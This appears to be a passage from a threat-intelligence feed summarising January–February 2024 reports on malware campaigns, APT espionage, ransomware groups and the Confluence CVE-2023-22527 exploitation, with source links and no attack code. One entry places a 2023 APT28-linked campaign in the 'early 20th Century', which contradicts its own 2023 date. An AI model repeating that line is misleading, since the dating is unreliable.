- Between November 2023 and January 2024, cybersecurity teams uncovered a series of cyber attacks by Stately Taurus targeting Myanmar’s military entities. The campaigns involved sophisticated malware delivery through phishing, using tactics like DLL hijacking and Cobalt Strike beacons. These efforts aimed at espionage against the Myanmar military, leveraging political tensions as bait for their attacks. The operation’s complexity and targeted nature highlight the ongoing cyber threats from state-sponsored actors in the region.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- The_Public_Information_and_Spam_Email
- Date of Scan:
- 2024-02-06
- Impact:
- LOW
- Summary:
- Multiple organizations make their contact details available to the public so that people can ask for assistance when they need it. This could be a list of all staff members’ public contacts or just general information. It should go without saying that having any information that is accessible to the public will make these accounts more vulnerable to spam or phishing emails.
Source:
https://isc.sans.edu/diary/Public+Information+and+Email+Spam/30620
—
- Intel Source:
- Krebsonsecurity
- Intel Name:
- Alleged_Medibank_Hacker_Aleksandr_Ermakov
- Date of Scan:
- 2024-02-06
- Impact:
- LOW
- Summary:
- The article discusses the recent financial sanctions imposed on Russian man Aleksandr Ermakov for his alleged involvement in the hacking of Australian health insurance company Medibank. Ermakov is believed to have worked with the ransomware group REvil and is accused of stealing and leaking sensitive data of 10 million customers. The article provides information on Ermakov’s aliases, his connection to REvil, and his involvement in other cybercrime activities. It also mentions his affiliation with a Russian technology firm and his connection to a cybercriminal known as “Rescator.” The article also discusses the potential impact of the sanctions on Ermakov’s life and the challenges he may face in Russia as a result.
Source:
https://krebsonsecurity.com/2024/01/who-is-alleged-medibank-hacker-aleksandr-ermakov/
—
- Intel Source:
- Fortinet
- Intel Name:
- The_distribution_of_Python_Info_stealer
- Date of Scan:
- 2024-02-06
- Impact:
- LOW
- Summary:
- In January 2024, FortiGuard Labs obtained an Excel document distributing an info-stealer related to a Vietnamese group first reported in August 2023. The attack uses simple downloaders to increase detection difficulty. The info-stealer collects browsers’ cookies and login data, compresses it, and sends it to the attacker’s Telegram bot.
Source:
https://www.fortinet.com/blog/threat-research/python-info-stealer-malicious-excel-document
—
- Intel Source:
- BI.ZONE
- Intel Name:
- Scaly_Wolf_Attacks_Russian_Business_With_White_Snake_Stealer
- Date of Scan:
- 2024-02-06
- Impact:
- LOW
- Summary:
- Researchers from BI.ZONE have connected the Scaly Wolf group to at least ten campaigns. Russian companies across a range of industries, including manufacturing and logistics, faced attacks. One of the group’s quirks is that they send phishing emails pretending to be from Russian government agencies in order to obtain initial access. Purported demands from Roskomnadzor, the Russian Federation’s Investigative Committee, and the Military Prosecutor’s Office of the Russian Federation are among the lures in the criminals’ phishing arsenal. Attackers occasionally disguise their emails as commercial offers.
—
- Intel Source:
- Cado Security
- Intel Name:
- Examining_New_Malware_Operation_Aimed_Against_Docker
- Date of Scan:
- 2024-02-05
- Impact:
- LOW
- Summary:
- Researchers at Cado have discovered the Commando Cat malware campaign, which targets Docker API endpoints exposed to the public. Since the start of 2024, there have been two campaigns that have targeted Docker. The first was the malicious deployment of the 9hits traffic exchange application, the results of which were reported just a few weeks ago.
—
- Intel Source:
- Any.Run
- Intel Name:
- CrackedCantil_malware
- Date of Scan:
- 2024-02-05
- Impact:
- LOW
- Summary:
- AnyRun researchers dive into a recent case of something they call a “malware symphony.” It’s a way to describe how different types of malware can work together, sort of like instruments in an orchestra.
Source:
https://any.run/cybersecurity-blog/crackedcantil-breakdown/
—
- Intel Source:
- Harfanglab
- Intel Name:
- The_exploitation_of_compromised_routers_to_target_goverment_in_Europe_and_Caucasus
- Date of Scan:
- 2024-02-05
- Impact:
- MEDIUM
- Summary:
- A look back at a malicious espionage campaign that targeted government organisations in Ukraine and Poland in the early 20th Century and may have been carried out by a threat actor known as APT28. HarfangLab identified additional malicious files and infrastructure which they believe with high confidence are part of the same campaign. The campaign targeted government organisations in Ukraine and Poland at least (and possibly in Azerbaijan as well), started on 2023-12-13 at the latest, and abused legitimate Ubiquiti network devices as infrastructure. HarfangLab could not reliably link the described campaign with APT28 in particular.
Source:
https://harfanglab.io/en/insidethelab/compromised-routers-infrastructure-target-europe-caucasus/
—
- Intel Source:
- SentinelOne
- Intel Name:
- A_malware_campaign_infecting_cracked_macOS_apps
- Date of Scan:
- 2024-02-05
- Impact:
- LOW
- Summary:
- Researchers discovered a malware campaign infecting cracked macOS apps from torrent sites to install a backdoor for further malware delivery. The malware disables security settings and then uses Python scripts to achieve persistence and retrieve additional payloads.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Examining_the_Newest_Stealer_Variant_of_Mispadu
- Date of Scan:
- 2024-02-05
- Impact:
- LOW
- Summary:
- Researchers from Unit 42 have recently found activities linked to the covert infostealer known as Mispadu Stealer, which was first identified in 2019. While searching for attempts to exploit the CVE-2023-36025 vulnerability, they came upon a family of infostealer malware that targets particular regions and URLs frequently associated with Mexican nationals.
Source:
https://unit42.paloaltonetworks.com/mispadu-infostealer-variant/
—
- Intel Source:
- Akamai
- Intel Name:
- FritzFrog_Botnet_Currently_Using_Log4Shell_Bug
- Date of Scan:
- 2024-02-05
- Impact:
- MEDIUM
- Summary:
- Akamai researchers have provided an explanation for the change in the FritzFrog botnet, which has been in existence since 2020. Typically, the botnet leverages brute-force attacks to breach SSH, a network connection protocol, in order to access servers and launch cryptominers. However, more recent versions now scan many system files on infected computers to identify targets that are very likely to be vulnerable to this attack.
Source:
https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
—
- Intel Source:
- RexorVc0
- Intel Name:
- Diving_Deep_into_Pony_Malware
- Date of Scan:
- 2024-02-05
- Impact:
- LOW
- Summary:
- Pony, also called Fareit or Siplog, is malware classified as a loader and stealer that may also be used as a botnet; it has been around for over a decade and is still in use. This notorious malware is still available for purchase, is still receiving upgrades, and has been used to launch other malware during attacks on victim infrastructures in addition to stealing confidential data.
—
- Intel Source:
- Securonix
- Intel Name:
- New_SUBTLE_PAWS_PowerShell_Backdoor_Drops_on_Ukraine
- Date of Scan:
- 2024-02-02
- Impact:
- MEDIUM
- Summary:
- Securonix researchers have identified an ongoing campaign (tracked as STEADY#URSA) that is likely tied to Shuckworm and targets military personnel in Ukraine. The malicious payload is delivered in compressed files, likely via phishing emails. The study found that military jargon and references to Ukrainian cities were present in a large number of the samples. Given that the attack includes multiple TTPs that are only used by this group and have been mentioned in previous campaigns against the Ukrainian military, it is most likely connected to Shuckworm.
—
- Intel Source:
- Cloudflare
- Intel Name:
- An_Incident_Occurred_During_Thanksgiving_2023
- Date of Scan:
- 2024-02-02
- Impact:
- LOW
- Summary:
- On November 23, 2023, Thanksgiving Day, Cloudflare discovered a threat actor on its self-hosted Atlassian server. Cloudflare’s security team shut down the threat actor’s access right away, launched an investigation, and on Sunday, November 26, invited CrowdStrike’s Forensic team to conduct an independent analysis.
Source:
https://blog.cloudflare.com/thanksgiving-2023-security-incident
—
- Intel Source:
- ASEC
- Intel Name:
- Hackers_Establishing_Backdoor_Accounts_on_Linux
- Date of Scan:
- 2024-02-02
- Impact:
- LOW
- Summary:
- Attack campaigns that involve installing a backdoor account on unmanaged Linux SSH servers have been identified for a long time. Threat actors will have the option to either sell the credentials they have gathered from the compromised systems on the dark web or utilize the extra backdoor accounts to later install malware strains like ransomware, CoinMiners, and DDoS bots on the compromised system.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- A_recent_Nitrogen_malware_campaign
- Date of Scan:
- 2024-02-01
- Impact:
- LOW
- Summary:
- Malwarebytes in their blog analyzed a recent Nitrogen campaign and how the initial payload is being served to victims. The threat actors prefer to host their payloads on compromised WordPress sites, many of which are already hacked with malicious PHP shell scripts.
—
- Intel Source:
- Palo Alto
- Intel Name:
- A_large_scale_campaign_called_ApateWeb
- Date of Scan:
- 2024-02-01
- Impact:
- LOW
- Summary:
- Unit 42 researchers discovered a large-scale campaign they call ApateWeb that uses a network of over 130,000 domains to deliver scareware, potentially unwanted programs (PUPs), and other scam pages. Among these PUPs, they identified several adware programs, including a rogue browser and different browser extensions.
Source:
https://unit42.paloaltonetworks.com/apateweb-scareware-pup-delivery-campaign/
—
- Intel Source:
- CERT-UA
- Intel Name:
- Over_2000_PCs_in_Ukraine_Impacted_by_DIRTYMOE
- Date of Scan:
- 2024-02-01
- Impact:
- MEDIUM
- Summary:
- DIRTYMOE has been recognized as a modular malware for over five years. It provides tools for remote access to a computer and is primarily (though not only) employed for mining and DDoS attacks. Initial compromise is typically achieved through widely used software bundled with an MSI installer. A rootkit installed with the backdoor hinders the removal of its components from the file system and registry while the operating system is in normal mode.
—
- Intel Source:
- Synacktiv
- Intel Name:
- KRUSTYLOADER_RUST_malware_analysis
- Date of Scan:
- 2024-02-01
- Impact:
- LOW
- Summary:
- On 18 January, Volexity published new evidence of compromised Ivanti Connect Secure instances, including hashes of Rust payloads downloaded onto the compromised instances. Synacktiv shared in their article a malware analysis of these unidentified Rust payloads, which they labeled KrustyLoader.
—
- Intel Source:
- Stairwell
- Intel Name:
- A_new_variant_of_VileRAT_malware
- Date of Scan:
- 2024-02-01
- Impact:
- LOW
- Summary:
- Last month, Stairwell’s research team observed a new variant of VileRAT that has been circulating since August 2023. Following public reports and detections of the associated filenames, the analysis showed that this variant is being distributed through fake software piracy sites to broadly infect systems.
Source:
https://stairwell.com/resources/technical-analysis-the-silent-torrent-of-vilerat/
—
- Intel Source:
- Cado Security
- Intel Name:
- A_novel_cryptojacking_campaign_Commando_Cat
- Date of Scan:
- 2024-02-01
- Impact:
- LOW
- Summary:
- Cado researchers have recently observed a new malware campaign, called “Commando Cat”, which targets exposed Docker API endpoints. This is the second campaign targeting Docker since the start of 2024, the first being the malicious deployment of the 9hits traffic exchange application.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- The_Grandoreiro_banking_trojan_operation
- Date of Scan:
- 2024-01-31
- Impact:
- LOW
- Summary:
- ESET has provided technical analysis, statistical information, and known command and control (C&C) server domain names and IP addresses. Due to a design flaw in Grandoreiro’s network protocol, ESET researchers were also able to get a glimpse into the victimology.
—
- Intel Source:
- Proofpoint
- Intel Name:
- The_Return_of_TA576
- Date of Scan:
- 2024-01-31
- Impact:
- LOW
- Summary:
- Researchers at Proofpoint have discovered the reappearance of TA576, a cybercriminal threat actor that targets accounting and finance companies in particular with tax-themed lures. This actor mostly targets North American organizations with low-volume email campaigns, and is only active during the first few months of the year, during tax season in the United States. In every campaign, the actor tries to distribute remote access trojans (RATs) and responds to emails asking for help with tax preparation.
Source:
https://www.proofpoint.com/us/blog/threat-insight/security-brief-tis-season-tax-hax
—
- Intel Source:
- TrendMicro
- Intel Name:
- An_Attack_Using_Stealth_And_Brute_Force
- Date of Scan:
- 2024-01-31
- Impact:
- LOW
- Summary:
- TrendMicro researchers have found that Pawn Storm remains unwavering in its pursuit to breach the networks and email accounts of high-profile targets worldwide. The group initially employed brute-force attacks from dedicated servers and later integrated more anonymization layers like commercial VPN services and Tor.
Source:
https://www.trendmicro.com/en_us/research/24/a/pawn-storm-uses-brute-force-and-stealth.html
—
- Intel Source:
- CSIRT-CTI
- Intel Name:
- China_linked_hackers_target_Myanmar_s_top_ministries
- Date of Scan:
- 2024-01-31
- Impact:
- MEDIUM
- Summary:
- Mustang Panda, the China-based threat actor has targeted Myanmar’s Ministry of Defence and Foreign Affairs as part of twin campaigns designed to deploy backdoors and remote access trojans.
Source:
https://csirt-cti.net/2024/01/23/stately-taurus-targets-myanmar/
—
- Intel Source:
- Cluster25
- Intel Name:
- The_Russian_Opposition_Faces_New_Campaign
- Date of Scan:
- 2024-01-31
- Impact:
- LOW
- Summary:
- Researchers from Cluster25 have discovered a recently launched campaign that is probably connected to a Russian APT group. The spear-phishing emails used in this effort went after organizations that supported Russian dissident movements and were publicly critical of the Russian government, both inside and outside the country.
Source:
https://blog.cluster25.duskrise.com/2024/01/30/russian-apt-opposition
—
- Intel Source:
- Mandiant
- Intel Name:
- The_Hidden_Depths_of_USB_Malware
- Date of Scan:
- 2024-01-31
- Impact:
- LOW
- Summary:
- Mandiant researchers have discovered a distinct evolution in the TTPs from the campaign’s early stages, commencing with the use of the explorer.ps1 payload featuring a custom decoding scheme. This progressed to the adoption of asymmetric encryption, accompanied by the incorporation of device tracking capabilities.
Source:
https://www.mandiant.com/resources/blog/unc4990-evolution-usb-malware
—
- Intel Source:
- Netenrich
- Intel Name:
- A_Deep_Dive_into_Alpha_Ransomware
- Date of Scan:
- 2024-01-30
- Impact:
- LOW
- Summary:
- Netenrich researchers provided updates on Alpha ransomware, a completely different group than ALPHV ransomware, which has recently emerged with the launch of its Dedicated/Data Leak Site on the Dark Web and an initial listing of six victims’ data.
Source:
https://netenrich.com/blog/alpha-ransomware-a-deep-dive-into-its-operations
—
- Intel Source:
- Red Canary
- Intel Name:
- MSIX_installers_deliver_malware_payloads
- Date of Scan:
- 2024-01-30
- Impact:
- LOW
- Summary:
- Starting in July 2023, Red Canary began investigating a series of attacks by adversaries leveraging MSIX files to deliver malware. The adversaries in each intrusion appeared to be using malicious advertising or SEO poisoning to draw in victims, who believed that they were downloading legitimate software such as Grammarly, Microsoft Teams, Notion, and Zoom.
—
- Intel Source:
- Fortinet
- Intel Name:
- Albabat_Ransomware_roundup
- Date of Scan:
- 2024-01-30
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs analysts researched a ransomware variant that caught their attention called Albabat. Albabat, also known as White Bat, is a financially motivated ransomware variant written in Rust that finds and encrypts files important to the user and demands a ransom to release them. It first appeared in November 2023. The affected platform is Microsoft Windows and the impacted parties are Microsoft Windows users.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-albabat
—
- Intel Source:
- AT&T and PaloAlto
- Intel Name:
- Microsoft_Teams_Delivers_DarkGate_Malware
- Date of Scan:
- 2024-01-30
- Impact:
- MEDIUM
- Summary:
- Although the majority of end users are probably aware of the risks associated with traditional phishing attacks, such as those that arrive by email or other media, many are probably not aware that Microsoft Teams chats could also be a potential source of phishing attacks. While most Teams activity takes place within an organization, Microsoft by default permits users to add persons from outside the organization to their Teams chats. This function has, somewhat unsurprisingly, given bad actors a new way to take advantage of unsuspecting or inexperienced users.
—
- Intel Source:
- ASEC
- Intel Name:
- Attacker_of_Trigona_Ransomware_Using_Mimic_Ransomware
- Date of Scan:
- 2024-01-30
- Impact:
- LOW
- Summary:
- ASEC researchers discovered a new way that the threat actor behind the Trigona ransomware is installing Mimic ransomware. Similar to previous instances, the newly discovered attack focuses on MS-SQL servers and is noteworthy for exploiting the MS-SQL servers’ Bulk Copy Program (BCP) feature to install malware.
—
- Intel Source:
- Cybereason
- Intel Name:
- Examining_DarkGate_Loader_in_Depth
- Date of Scan:
- 2024-01-30
- Impact:
- LOW
- Summary:
- Researchers at Cybereason have looked at occurrences involving the modular loader known as DarkGate Loader, which is sent via phishing emails and is in charge of delivering payloads that are used after an attack. Threat actors use the AutoIt script DarkGate Loader to deliver an encrypted payload. The payload is decrypted and injected into various processes by the AutoIt script. In the end, using DarkGate Loader triggers the use of post-exploitation tools like Meterpreter and Cobalt Strike.
Source:
https://www.cybereason.com/hubfs/dam/collateral/reports/darkgate-threat-alert.pdf
—
- Intel Source:
- Zscaler
- Intel Name:
- Zloader_Returned_With_New_Iteration
- Date of Scan:
- 2024-01-30
- Impact:
- LOW
- Summary:
- Zscaler researchers have discovered that Zloader has come back with an updated version, signaling a potential increase in ransomware attacks. The latest iteration of Zloader includes significant enhancements to its loader module, incorporating RSA encryption, an improved Domain Generation Algorithm (DGA), and advanced obfuscation techniques. Additionally, the malware now employs more junk code, API import hashing, and string encryption, making it more resilient against malware analysis.
Source:
https://www.zscaler.com/blogs/security-research/zloader-no-longer-silent-night
—
- Intel Source:
- Inquest
- Intel Name:
- The_malicious_URL_file_uses
- Date of Scan:
- 2024-01-30
- Impact:
- LOW
- Summary:
- Inquest shared their details about the exploration of URL files, and their resurgence in the threat space as various vulnerabilities and exposures have led to adversaries finding utility in this simple file type.
Source:
https://inquest.net/blog/shortcut-to-malice-url-files/
—
- Intel Source:
- Fortinet
- Intel Name:
- An_Additional_Phobos_Ransomware_Variant_Initiates_an_Attack
- Date of Scan:
- 2024-01-29
- Impact:
- LOW
- Summary:
- Researchers from FortiGuard Labs have discovered an Office document that includes a VBA script meant to spread the FAUST ransomware, a variant of Phobos. The attackers stored many Base64-encoded files, each containing a malicious binary, using the Gitea service. These files start a file encryption attack when they are loaded into the memory of a system.
Source:
https://www.fortinet.com/blog/threat-research/phobos-ransomware-variant-launches-attack-faust
—
- Intel Source:
- The DFIR Report
- Intel Name:
- Attackers_Exploiting_Publicly_Exposed_RDP_Host
- Date of Scan:
- 2024-01-29
- Impact:
- MEDIUM
- Summary:
- Researchers for The DFIR Report saw threat actors in late December 2022 taking advantage of a publicly accessible Remote Desktop Protocol server, which resulted in the exfiltration of data and the installation of the Trigona ransomware. The threat actors spread ransomware throughout the network on Christmas Eve, just three hours after they first gained access.
Source:
https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/
—
- Intel Source:
- Blackberry
- Intel Name:
- Persistent_Cyber_Threats_Targeting_Mexican_Entities
- Date of Scan:
- 2024-01-29
- Impact:
- LOW
- Summary:
- The BlackBerry Threat Research and Intelligence team have found that cyber attackers are consistently targeting Mexican organizations for financial gains. They use legitimate Mexican government resources, such as the IDSE software update document and the IMSS payment system SIPARE.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- A_Batch_File_Holding_Several_Payloads
- Date of Scan:
- 2024-01-29
- Impact:
- LOW
- Summary:
- Although most people consider Windows batch files (.bat) to be extremely basic, they can actually be fairly complicated or include intriguing encoded payloads. Researchers discovered one that was launched by a PowerShell process and contained several encoded payloads. The trick lies in how comments are added to these kinds of files: “REM” is the default (or most popular) keyword to use.
—
- Intel Source:
- SOC Radar
- Intel Name:
- Russian_APT_Operation_Star_Blizzard
- Date of Scan:
- 2024-01-29
- Impact:
- MEDIUM
- Summary:
- Star Blizzard’s strategies operate in the ever-evolving cyber threat arena with a measured precision akin to a strategic orchestration. In this case, spear-phishing is carried out in a manner that has been meticulously thought out and executed. This elusive group, with an advanced level of tradecraft akin to that of seasoned professionals, methodically pinpoints individuals and group members as its intended audience.
Source:
https://socradar.io/russian-apt-operation-star-blizzard/
—
- Intel Source:
- Cyble
- Intel Name:
- An_ongoing_phishing_campaign_spreads_with_an_Atomic_Stealer_version
- Date of Scan:
- 2024-01-26
- Impact:
- MEDIUM
- Summary:
- Cyble researchers discovered a new version of AMOS Stealer distributed through websites impersonating legitimate Mac applications, including Parallels Desktop, CleanMyMac, Arc Browser, and Pixelmator. Earlier this year, the AMOS stealer had been circulating via Google Ads, which served as its main distribution method.
—
- Intel Source:
- Palo Alto
- Intel Name:
- The_BianLian_ransomware_group
- Date of Scan:
- 2024-01-25
- Impact:
- MEDIUM
- Summary:
- The article discusses the detection and prevention of the BianLian encryptor and backdoor by Cortex XDR, as well as the use of SmartScore and protections offered by Palo Alto Networks. It also provides a list of IP addresses associated with the BianLian ransomware gang and additional resources for further information. The article also explores a potential connection between the BianLian and Makop ransomware groups and provides a technical analysis of the attack lifecycle of the BianLian group. It includes screenshots of alerts and prevention measures taken by Cortex XDR. The article also lists various codes and IP addresses related to the threat assessment of the malware.
Source:
https://unit42.paloaltonetworks.com/bianlian-ransomware-group-threat-assessment/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- New_China_Aligned_APT_Group_Called_Blackwood_Using_NSPX30_implants
- Date of Scan:
- 2024-01-25
- Impact:
- MEDIUM
- Summary:
- Researchers from ESET have presented a study of an attack carried out by Blackwood, a previously unidentified threat actor that they believe has been active since at least 2018. Blackwood is associated with China. Using adversary-in-the-middle (AitM) attacks, the attackers distribute a sophisticated implant they have termed NSPX30. They do this by taking advantage of update requests made by legitimate software.
—
- Intel Source:
- Sonatype
- Intel Name:
- Malware_Drops_From_Fake_NPM_Package
- Date of Scan:
- 2024-01-25
- Impact:
- LOW
- Summary:
- Researchers from Sonatype have discovered two npm packages, distube-config and discordyt, that mimic open source products such as Discord modules in an effort to infect Windows users with a Trojan.
Source:
https://blog.sonatype.com/fake-distube-config-npm-package-drops-windows-info-stealing-malware
—
- Intel Source:
- Arcticwolf
- Intel Name:
- Mimicking_CherryTree_to_Deploy_PrawEsc_Exploits
- Date of Scan:
- 2024-01-25
- Impact:
- LOW
- Summary:
- According to Arctic Wolf researchers, the loader poses as the authentic CherryTree note-taking program through its name and symbol, tricking potential victims into installing it. They have found evidence of this new attack tool in two recent incidents.
—
- Intel Source:
- ITOCHU Cyber & Intelligence Inc.
- Intel Name:
- The_Evolution_of_LODEINFO_Fileless_Malware
- Date of Scan:
- 2024-01-25
- Impact:
- LOW
- Summary:
- ITOCHU Cyber & Intelligence Inc. researchers have discovered an updated variant of the LODEINFO backdoor, which is disseminated through spear-phishing attacks. Both new features and modifications to the anti-analysis (analysis avoidance) strategies have been added to the malware.
Source:
https://blog-en.itochuci.co.jp/entry/2024/01/24/134100
—
- Intel Source:
- Shadowstackre
- Intel Name:
- Cactus_Ransomware_continued_activity
- Date of Scan:
- 2024-01-25
- Impact:
- LOW
- Summary:
- On January 20th, the Cactus ransomware group again targeted a large number of victims across different industries. The attacks were revealed with the victims’ data on the group’s leak site. The ransomware group constantly puts a lot of pressure on victims by revealing personal information about employees of the victim organization; this has included driver’s licenses, passports, pictures, and other personal identification.
—
- Intel Source:
- Security Affairs
- Intel Name:
- An_Italian_Adaptive_Phishing_Campaign_called_MY_SLICE
- Date of Scan:
- 2024-01-25
- Impact:
- LOW
- Summary:
- A highly targeted phishing campaign last year targeted email account holders of Italian organizations under the alias “My slice,” a name taken from a variable in the landing page’s JavaScript code.
Source:
https://securityaffairs.com/157914/cyber-crime/my-slice-aitalian-adaptive-phishing-campaign.html
—
- Intel Source:
- ASEC
- Intel Name:
- Kasseika_Ransomware_Exploiting_LNK_Vulnerabilities
- Date of Scan:
- 2024-01-24
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Intelligence Center exposes a stealthy attack leveraging a malicious Word document disguised as an .lnk shortcut file. The attack, featuring the notorious AsyncRAT (VenomRAT), uses PowerShell commands and external URLs to download and execute payloads. The malware disguises itself as a Korean company’s certificate, making detection challenging.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Parrot_TDS_malware_campaign
- Date of Scan:
- 2024-01-24
- Impact:
- MEDIUM
- Summary:
- The article provides an overview of the Parrot TDS malware campaign, which has been active for over four years and continues to evolve with new techniques and obfuscations. The campaign targets victims globally and uses automatic tools to exploit known vulnerabilities, with the majority of compromised servers using WordPress, Joomla, or other content management systems. The article includes a list of codes and identifiers related to the campaign, as well as examples of the landing and payload scripts used. It also discusses the protections and mitigations offered by Palo Alto Networks and provides indicators of compromise for detecting and defending against malware.
Source:
https://unit42.paloaltonetworks.com/parrot-tds-javascript-evolution-analysis/
—
- Intel Source:
- Infoblox
- Intel Name:
- Massive_Criminal_Affiliate_Program_by_Vextrio
- Date of Scan:
- 2024-01-24
- Impact:
- LOW
- Summary:
- Researchers from Infoblox expose a complex web of affiliations within the cybercrime ecosystem, focusing on prominent actors like VexTrio, ClearFake, and SocGholish. Collaboratively researched with security expert Randy McEoin, the study reveals these entities’ involvement in malicious activities, particularly in operating traffic distribution systems (TDS). VexTrio, a major player, is identified as the most pervasive threat in customer networks, acting as a traffic broker for over 60 affiliates. The research sheds light on their unique TDS model, attack chains involving multiple actors, and their exploitation of referral programs. The findings emphasize the critical role of TDS enterprises in the vast cybercrime economy and advocate for increased industry collaboration to counter these threats effectively.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Ransomware_Kasseika_Using_BYOVD_Attacks
- Date of Scan:
- 2024-01-23
- Impact:
- LOW
- Summary:
- TrendMicro researchers have examined the Kasseika ransomware and the indications they discovered imply that the perpetrators had obtained the source code of the infamous BlackMatter ransomware.
—
- Intel Source:
- Project Discovery, ISC.SANS, Picus Security
- Intel Name:
- Update_on_Atlassian_Exploit_Activity_of_critical_vulnerabilty_CVE_2023_22527
- Date of Scan:
- 2024-01-23
- Impact:
- HIGH
- Summary:
- Exploit activity against Atlassian Confluence servers has exploded over the last couple of days. The combination of a simple-to-exploit vulnerability and a potential set of high-value targets makes this an ideal vulnerability for many attackers. On January 16, 2024, Atlassian shared a disclosure about a remote code execution vulnerability affecting Confluence Data Center and Confluence Server. CVE-2023-22527 is an OGNL injection vulnerability with a CVSS score of 10. This critical vulnerability poses a significant risk to organizations.
Source:
https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/
https://isc.sans.edu/diary/Scans%20Exploit%20Attempts%20for%20Atlassian%20Confluence%20RCE%20Vulnerability%20CVE-2023-22527/30576
https://isc.sans.edu/diary/0
https://www.picussecurity.com/resource/blog/cve-2023-22527-another-ognl-injection-leads-to-rce-in-atlassian-confluence
—
- Intel Source:
- ASEC
- Intel Name:
- New_Legitimate_Program_Unveiled_In_DLL_Side_Loading_Attack
- Date of Scan:
- 2024-01-23
- Impact:
- LOW
- Summary:
- AhnLab Security Intelligence Center (ASEC) reveals the Lazarus Group’s latest cyber threat tactic involving a new legitimate program, “wmiapsrv.exe,” discovered on January 12, 2024. This program, utilized in DLL side-loading attacks (T1574.002), loads modified malicious DLLs, such as “wbemcomn.dll” and “netutils.dll,” serving as backdoors. The verification routine in wbemcomn.dll involves unique system information, making this an Advanced Persistent Threat (APT) attack aimed at specific systems.
—
- Intel Source:
- Reversing Labs
- Intel Name:
- Attackers_Using_GitHub_to_Store_Stolen_Data
- Date of Scan:
- 2024-01-23
- Impact:
- LOW
- Summary:
- Two malicious packages on the npm open source package manager have been found by ReversingLabs researchers. These packages use GitHub to store stolen, Base64-encoded SSH keys taken from the developer workstations that installed them.
Source:
https://www.reversinglabs.com/blog/gitgot-cybercriminals-using-github-to-store-stolen-data
—
- Intel Source:
- Sentinelone
- Intel Name:
- Hackers_Targeting_Cybersecurity_Professionals
- Date of Scan:
- 2024-01-23
- Impact:
- MEDIUM
- Summary:
- Researchers at SentinelLabs have noticed a campaign by ScarCruft, a possible APT outfit based in North Korea, that targets prominent figures with knowledge of North Korean affairs as well as media outlets. ScarCruft is experimenting with new infection chains, one such trial was using a technical threat research paper as a ruse, presumably aimed at threat information users such as cybersecurity experts.
—
- Intel Source:
- Fortinet
- Intel Name:
- PyPI_Packages_That_Steal_Information
- Date of Scan:
- 2024-01-23
- Impact:
- LOW
- Summary:
- Researchers from FortiGuard Labs have discovered a PyPI malware author (known only by the ID “WS”) who subtly uploads malicious packages to PyPI. According to their current estimates, there could be more than 2000 “WS” victims from the listed packages alone.
Source:
https://www.fortinet.com/blog/threat-research/info-stealing-packages-hidden-in-pypi
—
- Intel Source:
- Cyble
- Intel Name:
- MetaStealer_Malware_Targeting_US_Asylum_Seekers
- Date of Scan:
- 2024-01-23
- Impact:
- LOW
- Summary:
- Researchers at Cyble have discovered a ZIP archive file that may be downloaded from a URL and might be shared via spam emails. Inside the ZIP package is a shortcut LNK file disguised as a PDF document. When the shortcut file is executed, the VPN application launches and uses DLL sideloading to load a hidden malicious DLL. Both the DLL and the VPN program are hidden within the ZIP file.
Source:
https://cyble.com/blog/threat-actors-target-us-asylum-seekers-with-metastealer-malware/
—
- Intel Source:
- Trellix
- Intel Name:
- Kuiper_Ransomware_s_advanced_capabilities
- Date of Scan:
- 2024-01-22
- Impact:
- LOW
- Summary:
- Trellix researchers shared their analysis of the threat actor’s sales post for the ransomware, its Windows, Linux, and macOS binaries, and a version comparison. The version comparison is included in the technical analysis. The analyzed files, their hashes, and the detection information are listed at the end of their blog.
Source:
https://www.trellix.com/about/newsroom/stories/research/the-evolution-of-the-kuiper-ransomware/
—
- Intel Source:
- ASEC
- Intel Name:
- SmokeLoader_Distribution_Aims_at_Ukrainian_Government_and_Businesses
- Date of Scan:
- 2024-01-22
- Impact:
- MEDIUM
- Summary:
- Researchers from ASEC have found that the Ukrainian government and businesses are receiving many infections of the SmokeLoader malware. Attacks on Ukraine appear to have grown in frequency recently. The Ukrainian Department of Justice, government agencies, insurance providers, healthcare providers, construction businesses, and manufacturing companies are among the targets confirmed thus far.
—
- Intel Source:
- Morphisec
- Intel Name:
- Update_to_the_Chaes_malware
- Date of Scan:
- 2024-01-22
- Impact:
- LOW
- Summary:
- Morphisec Threat Labs has provided an analysis of Chae$ 4.1, an update to the Chaes Infostealer malware.
Source:
https://www.morphisec.com/hubfs/Chae$_Chronicles_Chaes4.1.pdf
https://blog.morphisec.com/chaes-chronicles
—
- Intel Source:
- Stairwell
- Intel Name:
- The_Trust_in_Digitally_Signed_Certificates_Is_Not_Always_Secure
- Date of Scan:
- 2024-01-22
- Impact:
- MEDIUM
- Summary:
- According to Stairwell threat experts, “Hainan YouHu Technology Co. Ltd.” is responsible for submitting the LaiXi file to Microsoft for signing. This app is made for social media content marketing and bulk administration of mobile devices. The program may be downloaded for Windows and Android from dl.cnhack[.]com. Interestingly, the malicious sample examined came from a LaiXi_setup.exe file.
—
- Intel Source:
- Securelist
- Intel Name:
- Backdoor_in_macOS_Steals_Cryptowallets
- Date of Scan:
- 2024-01-22
- Impact:
- LOW
- Summary:
- Researchers at Securelist have discovered a new, previously unidentified family of macOS malware distributed through cracked software. The threat turned out to be much more serious than the unauthorized installation of a proxy server.
Source:
https://securelist.com/new-macos-backdoor-crypto-stealer/111778/
—
- Intel Source:
- Cado Security
- Intel Name:
- Using_9Hits_Maliciously_on_Susceptible_Docker_Hosts
- Date of Scan:
- 2024-01-22
- Impact:
- LOW
- Summary:
- Researchers at Cado Security have noticed a new campaign that targets weak Docker services. The campaign installs the 9hits viewer application and a standard XMRig miner in two containers on the vulnerable instance. This is the first instance of malware using the 9hits application as a payload that has been reported.
Source:
https://www.cadosecurity.com/containerised-clicks-malicious-use-of-9hits-on-vulnerable-docker-hosts/
—
- Intel Source:
- Greynoise
- Intel Name:
- Cryptomine_Exploit_Connect
